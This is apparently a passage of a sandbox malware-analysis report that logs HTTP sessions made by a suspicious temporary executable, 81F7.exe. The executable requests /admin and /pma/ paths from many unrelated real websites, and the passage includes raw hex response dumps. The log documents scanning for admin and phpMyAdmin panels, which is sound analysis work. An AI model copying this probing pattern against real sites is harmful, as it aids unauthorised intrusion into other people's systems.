b0 2d f6 d4 f1 46 07 35 d9 ce c6 41 d0 f7 ed 69 78 38 f0 fa b3 09 e8 60 44 1f 4e 1c 2e be 8b 91 7c 05 a2 b1 0e 8b de dd 5d c8 f0 f9 d4 b1 fa bc ac 86 be aa 61 fc 2b fb 07 35 05 66 e3 20 a6 5d 69 e0 06 fa 14 64 e3 61 7f 5c 92 04 2c d5 6a 79 54 28 b1 1a 06 f8 be 9a 81 31 27 a2 2f 14 d6 2c 27 e4 be 6b 85 18 a4 f0 76 8a b1 b7 a6 53 c7 ee 5b a1 ed b9 35 3f 08 7e 02 89 f1 8a c8 da d1 0a 90 8e 3d f1 ad df 67 de 3e 7b ce f9 a0 c8 10 0e 51 ae a6 65 bb f0 8f c3 ea 37 6f 42 e3 66 f9 7a 51 fc 20 4e 54 03 e2 17 23 fa e8 91 e2 0b 45 b2 90 df 84 b5 4f d6 b5 25 87 11 ac f8 e8 d1 a3 b9 ed 0e bc b9 71 39 9f f2 89 f7 c9 ee f2 30 04 63 07 e0 93 2f 5a cf 0a f8 5b df d1 da 42 7e 83 f6 87 da 87 9a 1a 9f 0f 35 7b 62 8d 78 f0 a1 d6 f7 7c fe a1 26 2a 7f a8 35 8c 86 61 7e a8 ed 34 6e 76 1a 1f 6a 5a 55 03 48 54 37 a6 ee 08 5f 82 eb d1 83 9a 43 3d d1 18 fe 9e c8 f6 f0 89 da f3 66 7e 9f 6b ed 2f 1a e4 1f bc 20 90 50 d8 0a 64 f3 d8 f0 43 6d 3e d5 6d b7 ef cc 06 84 fe 27 fc e0 81 a8 aa 43 1b 70 f4 d9 98 d8 ae f1 29 f8 f9 9a fb 9d 96 b1 63 34 76 b5 af 5f f7 89 5a 9b 10 d2 3e f1 5c 39 ac 5a 55 5e f9 72 6d f9 cc af ba 55 bb ea 75 2c a3 ef 73 60 a1 84 ae ac f5 2d 17 c4 d6 2a 55 a7 e3 19 23 1e 3e 23 2d 75 13 3e 79 92 fe 56 d6 1a 03 08 57 d4 30 eb 97 43 d9 2c 5f 6e 50 0d 5c 65 9f 1b 81 df ef 84 55 0e ed 32 04 96 dc 90 52 b1 38 c4 55 8b e0 2a 84 82 a7 b7 17 d6 88 b4 40 59 23 3d ab 55 de d7 3f 1a 10 24 ee 0e 9e 8d 6d 67 50 e6 95 af 43 cf 2f db 9d 23 df b7 6e cb da d0 b1 88 ce 82 38 2d f4 03 60 67 Data Ascii: 253a}ru\ufv#iGDI'[N3qr6{6I(S,;VyIL99_mmmR%@7Fw8<~ooN88+:9;hhfA{h0k5o45&aq&T\|ngFSp-[~%/\k;S5(83vK}b>w:560Fv4nn4gjQ]~c1j1O.CvrqF\|8seO6LsJ7g]n3>-F5Aix8`DN.\|]a+5f ]ida\,jyT(1'/,'kvS[5?~=g>{Qe7oBfzQ NT#EO%q90c/Z[B~5{bx\|&5a~4nvjZUHT7_C=f~k/ PdCm>m'Cp)c4v_Z>\9ZU^rmUu,s`-U#>#-u>yVW0C,_nP\eU2R8U@Y#=U?$mgPC/#n8-`g
Feb 21, 2024 00:26:17.665772915 CET	1286	IN	Data Raw: 53 d2 b8 41 e7 0b 07 75 6e a1 dd dd 51 7b b3 5e 4d be 9d dc f4 f9 34 7c 8e 9a 78 fe b5 ea 76 ea fb ee 81 6d 38 dc 1d 85 e3 7d f7 a7 9f 2a 49 2b ef ed f7 ee c7 8f 9d a8 ef 71 cf ab 56 a7 1b fa 68 da 18 fa de e4 19 66 81 67 de 80 ef db c3 f2 a6 f3 Data Ascii: SAunQ{^M4\|xvm8}I+qVhfgu\34Tv>?\!'s{41)"16m^gPZCGIIUjnmWw}6]\|[ehpfvMUoUwN}o[A
Feb 21, 2024 00:26:17.665838003 CET	1286	IN	Data Raw: 98 8e d0 13 e4 f4 24 0b d2 f2 73 db 61 82 4f be a7 95 05 d6 8b 4c b7 84 1e 07 9b ba fe de 1e 32 27 64 a7 27 6c ef 23 ac 3a 35 7d d3 3c 9d f6 56 3f d0 52 c3 0c 6e f3 1a 39 d1 b7 82 b1 7d 0d 0f a9 0d df 1c 3e a9 c9 54 cb 99 c3 7f 28 68 78 37 e0 02 Data Ascii: $saOL2'd'l#:5}<V?Rn9}>T(hx7>N_bfYf==#F2,z6qen%z7%\Gaa9a(8m-0Cc,no76mOE1Mm[.
Feb 21, 2024 00:26:17.665862083 CET	1286	IN	Data Raw: 0d a6 e6 45 f9 1a 7d 19 37 b3 05 a4 1c 68 87 dd b7 cf 7e 39 01 0f 37 0f 0f c4 d2 0f 99 68 63 0f ae 54 40 8d 9b 94 8d 88 d7 b1 01 09 42 8a 55 df 6a ff 01 79 26 1f 11 13 d2 df 47 07 c2 2a 4d c5 e1 16 20 68 4c ba 87 91 7e e7 b9 3d 67 e6 77 34 24 41 Data Ascii: E}7h~97hcT@BUjy&GM hL~=gw4$A#STSUR_Kwg1shSf# wKb[lPDF+RDAOSSS<9-RGYX}*GBvAhDg+-H1Ar8"A8YlKM/5NC
Feb 21, 2024 00:26:17.665939093 CET	1286	IN	Data Raw: 4d 17 fb f7 8e 68 11 aa 3d d4 7d 77 27 7e 7a b3 5e bf c1 4f ca 99 a7 91 b3 0b fb 20 35 13 a6 29 9c 09 e4 cd 55 5f 6a 18 57 e5 c4 03 bd 9e 13 8b c2 dd 00 99 40 2f e0 82 78 c5 67 28 0e 8d 7d 8f c3 ce 58 d8 9f 28 7b 28 4d 0a f8 31 68 87 62 4f ec 50 Data Ascii: Mh=}w'~z^O 5)U_jW@/xg(}X({(M1hbOPp.<B>`_M\|~O0RQ,oEVo@8VOUluNB@,=z'GujE,~ yR2%F.G8Ij~DF>qR
Feb 21, 2024 00:26:17.665988922 CET	1286	IN	Data Raw: 79 99 99 b5 e1 b3 a0 99 5b 78 e6 1f 15 1a 4e 25 d8 14 0e 42 e8 71 a4 f7 b8 8d 10 87 f2 23 51 4c 4a 1e bd d5 55 ef b1 c7 c9 4e fc 4c 44 73 f2 7c 12 54 39 93 8b 8f 6b 21 30 e0 b3 10 ab 7e f8 48 06 3a 1c cf 70 d3 8e c2 74 e2 c0 71 f2 9e 4d 66 f0 05 Data Ascii: y[xN%Bq#QLJUNLDs\|T9k!0~H:ptqMfg.\#Kr&\|r(M#r.:]I >+l0-"/&<d-vZM#YG5FC#J8LNL_EN}lfp1"$#!/GB{dNdafHHv82
Feb 21, 2024 00:26:17.666038990 CET	1286	IN	Data Raw: 45 2d 72 43 2d 73 be b9 93 a7 e3 cc 64 ae 28 42 af d8 cf b5 1e 5e 9f 70 42 93 8b b0 5b 18 e6 90 cc 6c e5 0e 64 32 51 14 41 ec 57 09 81 5d 88 cd 54 c5 99 ff 13 02 9d 2e 24 3a 80 a3 2c 0f 37 33 4f a1 99 c9 cc b0 72 38 a5 a1 f6 6b 0a c4 7a 64 73 a0 Data Ascii: E-rC-sd(B^pB[ld2QAW]T.$:,73Or8kzdslk@Gf2^FrQ]ona[9rzoHe#*3q3E'D2@rczE!_j0+(\|`lY-9cLHTkD
Feb 21, 2024 00:26:17.666110992 CET	951	IN	Data Raw: c9 6c 5c cf 29 ce ef 4d d7 65 0c 57 65 94 05 f0 f7 f6 47 dc 25 89 6c be 57 e8 89 41 87 07 dc bc 1e 96 4b 83 e0 77 91 d9 6d 0f 4a 15 b6 d9 61 ba c9 9e 3c 91 4d 53 8d 29 4e ff 72 c3 57 c0 de 80 e1 4f 55 59 07 54 38 42 61 3a 2b 78 f9 5f 0c 2b 55 13 Data Ascii: l\)MeWeG%lWAKwmJa<MS)NrWOUYT8Ba:+x_+Uf!s@yH-$HrC{,e7WEh4QN:!%xvX.=,\^yJ}5S9o\>9LTQwa(aX[EI1K\|VpCxqI-^

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
438	192.168.2.6	50725	144.91.85.110	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:17.240484953 CET	165	OUT	GET /admin HTTP/1.1 Host: m-viper.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:17.420295000 CET	527	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 20 Feb 2024 23:26:17 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://m-viper.de/admin X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Permitted-Cross-Domain-Policies: master-only Referrer-Policy: same-origin Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
439	192.168.2.6	50926	3.33.130.190	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:17.257262945 CET	168	OUT	GET /admin HTTP/1.1 Host: blauthlaw.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:17.358438969 CET	218	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:17 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://blauthlaw.com/admin ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
440	192.168.2.6	50724	23.236.62.147	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:17.299082994 CET	167	OUT	GET /admin HTTP/1.1 Host: gmcocorp.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:17.510165930 CET	536	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:17 GMT Content-Length: 0 Connection: keep-alive location: https://www.gmcocorp.com/admin strict-transport-security: max-age=3600 x-wix-request-id: 1708471577.388732499970118901 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=uw2-pub-1 X-Seen-By: xIKq3IotbbLp4+7DTTMx8R9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLvmNxQAS6Fdx1wVS+tohYr0m++C2XkuTvnlRFg2XiSDL,2d58ifebGbosy5xc+FRaloOsf+ARlz411O8UcgFI79tCxQyaX6PiA+kBhgdZjmJvNMQXGMmcCR3coSG7OQJQag==,2UN Data Raw: Data Ascii:
Feb 21, 2024 00:26:17.510179043 CET	256	IN	Data Raw: 37 4b 4f 71 34 6f 47 6a 41 35 2b 50 4b 73 58 34 37 49 4e 42 2f 62 41 6f 6a 66 48 6a 41 42 32 6a 45 4f 77 33 47 6a 6b 52 32 72 78 43 54 67 61 4a 37 2f 4b 32 4b 78 39 6a 68 41 66 43 2c 52 38 6e 56 77 50 4a 76 39 51 4a 4c 31 6d 37 38 4f 52 4f 4f 2b Data Ascii: 7KOq4oGjA5+PKsX47INB/bAojfHjAB2jEOw3GjkR2rxCTgaJ7/K2Kx9jhAfC,R8nVwPJv9QJL1m78OROO+O9xU1dn3Y1oNq7RDoqd004=,9n3wTMzaU7zAZzBAj7gVU6RkSst/bXPEBo8qixNbARz4D2PFRhC5HA4zrltzn4LTvpmiH49/EXqYIBhozSndWg==Cache-Control: no-cacheX-Content-Type-Options

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
441	192.168.2.6	50994	13.248.169.48	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:17.314227104 CET	169	OUT	GET /admin HTTP/1.1 Host: acidvision.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:17.410676003 CET	219	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:17 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://acidvision.com/admin ETag: "65d0dd59-0"
Feb 21, 2024 00:26:17.616802931 CET	219	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:17 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://acidvision.com/admin ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
442	192.168.2.6	50876	162.0.235.125	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:17.314351082 CET	175	OUT	GET /pma/ HTTP/1.1 Host: norwegischlernen.info Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:17.475963116 CET	1040	IN	HTTP/1.1 301 Moved Permanently keep-alive: timeout=5, max=100 content-type: text/html content-length: 795 date: Tue, 20 Feb 2024 23:26:17 GMT server: LiteSpeed location: https://norwegischlernen.info/pma/ x-turbo-charged-by: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
443	192.168.2.6	50435	221.121.158.21	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:17.332454920 CET	171	OUT	GET /admin HTTP/1.1 Host: houseguru.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:17.639498949 CET	1286	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:17 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Server: imunify360-webshield/1.21 Last-Modified: Tuesday, 20-Feb-2024 23:26:17 GMT Cache-Control: private, no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0 cf-edge-cache: no-cache Data Raw: 35 36 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 6c 65 61 73 65 20 77 61 69 74 20 77 68 69 6c 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 69 73 20 62 65 69 6e 67 20 76 65 72 69 66 69 65 64 2e 2e 2e 3c 2f 68 31 3e 0a 3c 66 6f 72 6d 20 69 64 3d 22 77 73 69 64 63 68 6b 2d 66 6f 72 6d 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 20 61 63 74 69 6f 6e 3d 22 2f 7a 30 66 37 36 61 31 64 31 34 66 64 32 31 61 38 66 62 35 66 64 30 64 30 33 65 30 66 64 63 33 64 33 63 65 64 61 65 35 32 66 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 77 73 69 64 63 68 6b 22 20 6e 61 6d 65 3d 22 77 73 69 64 63 68 6b 22 2f 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 76 61 72 20 77 65 73 74 3d 2b 28 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 65 61 73 74 3d 2b 28 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 Data Ascii: 562<!doctype html><html><head><meta charset="utf-8"><meta name="robots" content="noindex, nofollow"><title>One moment, please...</title><style>body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center;}</style></head><body><h1>Please wait while your request is being verified...</h1><form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="get"><input type="hidden" id="wsidchk" name="wsidchk"/></form><script>(function(){ var west=+((+!+[]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![])+(+!+[]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![])), east=+((+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![])+(+!+[]+!![]+!![]+[])+(+!+[])+(+!+[]+!![]+!!
Feb 21, 2024 00:26:17.639566898 CET	439	IN	Data Raw: 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 21 21 77 69 6e 64 6f 77 2e 61 64 64 45 Data Ascii: []+!![]+!![]+!![]+[])+(+!+[]+!![])), x=function(){try{return !!window.addEventListener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener("DOMContentLoaded",y,z) : document.attachEvent("onreadystatechange
Feb 21, 2024 00:26:17.639647007 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
444	192.168.2.6	51023	185.230.63.186	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:17.342984915 CET	175	OUT	GET /admin HTTP/1.1 Host: montessorihawaii.org Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:17.508219004 CET	839	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:17 GMT Content-Length: 0 Connection: keep-alive location: https://www.montessorihawaii.org/admin strict-transport-security: max-age=3600 x-wix-request-id: 1708471577.3831474577906125750 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42 X-Seen-By: vmPhUNXuQemvc7fjBI8NWewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLrb3eKb2faxipHpDHW1Enb5/HubKAh1QhTB6OuUXtTGV,2d58ifebGbosy5xc+FRalqbkgfSSddb9dXPKnf7lbNpL5b3Vh5xwUMv4MkEZ0+Sss6Gb7n7fiGKg6D9ivkSDsg==,2UNV7KOq4oGjA5+PKsX47Ad3BAkeAb9lWxcyN70+/DFYgeUJqUXtid+86vZww+nL,Av/qWudICkhRTCN8pPYKz67T02HXAs3+PXof1ish5pM=,3+SKj2WaFkDLVdR9vyo8lJ/76x7/stiZn8lkJEBHkQI=,/j+AjfLiOiE0Vc9NsP8sK4wRwdsym/8rjzUP5A/qGmXyEPhhqrz5x6CGm56MeUd2/64sEjeNjExOBUpktkI8WA== Cache-Control: no-cache X-Content-Type-Options: nosniff

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
445	192.168.2.6	51061	15.197.204.56	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:17.357109070 CET	165	OUT	GET /admin HTTP/1.1 Host: att.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:17.452521086 CET	215	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:17 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://att.com.au/admin ETag: "65d0dd59-0"
Feb 21, 2024 00:26:17.660315990 CET	215	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:17 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://att.com.au/admin ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
446	192.168.2.6	50966	85.13.138.112	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:17.372211933 CET	165	OUT	GET /admin HTTP/1.1 Host: popular.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
